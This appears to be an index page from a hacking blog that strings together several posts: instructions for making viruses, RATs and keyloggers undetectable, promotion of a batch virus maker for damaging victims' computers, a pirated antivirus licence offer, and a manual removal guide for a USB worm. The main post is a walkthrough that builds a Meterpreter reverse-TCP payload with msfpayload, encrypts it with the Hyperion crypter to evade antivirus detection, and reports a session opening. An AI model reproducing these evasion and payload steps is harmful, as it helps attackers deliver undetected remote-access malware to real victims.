How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi To All The 

Requirements:-
1. Backtrack 5 or any Linux Distro Having msfencoders
2. your own virus/rat/keylogger engine mine is test1.exe
follow The commands shown in figure:-
 perform all steps having root permission
Note:- click on image to see a bigger image

if You Have Any Query Write in Below Comments...
We Will Try To Figure out 

Continue Reading

How To Create Virus Without Any Programming Knowledge

Hi To All 

Tool Name:- Sonic Bat Batch File Virus Maker

Add caption

This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer. Try it and enjoy….
if you face any trouble please comments below , your queries are valuable to us...
CLICK THE ADVERTISEMENT JUST AFTER THIS POST    batch, batch virus, batch virus maker, batch viruses, Ethical H4cking, Security Testing, Tools, Virus, ===(Next Is What...?)===

How To Create Virus Without Any Programming Knowledge

batch virus batch virus maker batch virus batch virus maker

Continue Reading

AVG Antivirus Full Version Free Download Licences Till 2018

Hi To All 

CLICK ON ADVERTISMENT TO SUPPORT US=========>

After A Short holiday , i am here to Share my toolbox with your empty drives, So I Am Not going to Explain Much Because if you were googling For this post then its your turn , yes you got your page For downloading  Full Version Of AVG Antivirus.

===(Next Is What...?)===

Continue Reading

Installing Eset Nod32 Antivirus with Offline Updates

Continue Reading

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip



















Uzip It.

unzip Hyperion-1.0.zip
























Change the directory, and compile it.

cd Hyperion-1.0.zip

wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe





Scan it. 
Once the payload is ready, we will scan it first (without crypting).

Lets Crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe

ls -l





Scan it.
No Detection






Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.

Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.






I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

Continue Reading

How to remove new folder exe or regsvr exe or autorun inf virus

I want to tell you a story, two days back i got affected by this virus very badly as it eat up all my empty hard disk space of around 700 MB.
The file which is responsible for all this is identified as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.

Manual Process of removal

1.Cut The Supply Line

1. Search for autorun.inf file. It is a read only file so you will have to change it to normal by right clicking the file , selecting the properties and un-check the read only option
2. Open the file in notepad and delete everything and save the file.
3. Now change the file status back to read only mode so that the virus could not get access again.
   
   
   
   
   
   1. Click start->run and type msconfig and click ok
   2. Go to startup tab look for regsvr and uncheck the option click OK.
   3. Click on Exit without Restart, cause there are still few things we need to do before we can restart the PC.
   4. Now go to control panel -> scheduled tasks, and delete the At1 task listed their.
   
   
   
   
   Open The Gates Of Castle 
   
   
   a. Click on start -> run and type gpedit.msc and click Ok.
   
   
   
   
   
   b.  If you are Windows XP Home Edition user you might not have gpedit.msc in that case      
        download and install it from Windows XP Home Edition: gpedit.msc and then follow these 
        steps.
   
   
    Go to users configuration->Administrative templates->system 
    Find “prevent access to registry editing tools” and change the option to disable.
   
   
   
   
   
   1.
   a. Once you do this you have registry access back.
   
   
   2. Launch The Attack At Heart Of Castle
   
   
         a. Click on start->run and type regedit and click ok
         b. Go to edit->find and start the search for regsvr.exe
   Part 2.
   
   
   
   
   
   2. Delete all the occurrence of regsvr.exe; remember to take a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences only.
   3. At one ore two places you will find it after explorer.exe in theses cases only delete the regsvr.exe part and not the whole part. E.g. Shell = “Explorer.exe regsvr.exe” the just delete the regsvr.exe and leave the explorer.exe
   1. Seek And Destroy the enemy soldiers, no one should be left behind
      1. Click on start->search->for files and folders.
      2. Their click all files and folders
      3. Type “*.exe” as filename to search for
      4. Click on ‘when was it modified ‘ option and select the specify date option
      5. Type from date as 11/14/2012 and also type To date as 11/14/2012
         
         
         
         
         
      7. Now hit search and wait for all the exe’s to show up.
      8. Once search is over select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31^st January.
      9. Also selecting lot of files together might make your computer unresponsive so delete them in small bunches.
      10. Also find and delete regsvr.exe, svchost .exe( notice an extra space between the svchost and .exe)
   2. Time For Celebrations
   1. Now do a cold reboot (ie press the reboot button instead) and you are done.
   I hope this information helps you win your own battle against this virus. Soon all antivirus programs will be able to automatically detect and clean this virus. Also i hope Avast finds a way to solve this issues.
   As a side note i have found a little back dog( winpatrol ) that used to work perfectly on my old system. It was not their in my new PC, I have installed it again , as I want to stay ahead by forever closing the supply line of these virus. You can download it form Winpatrol website.
   UPDATE : Avast Boot Time Scheduling
   
   
   
   
   
   
   
   

Continue Reading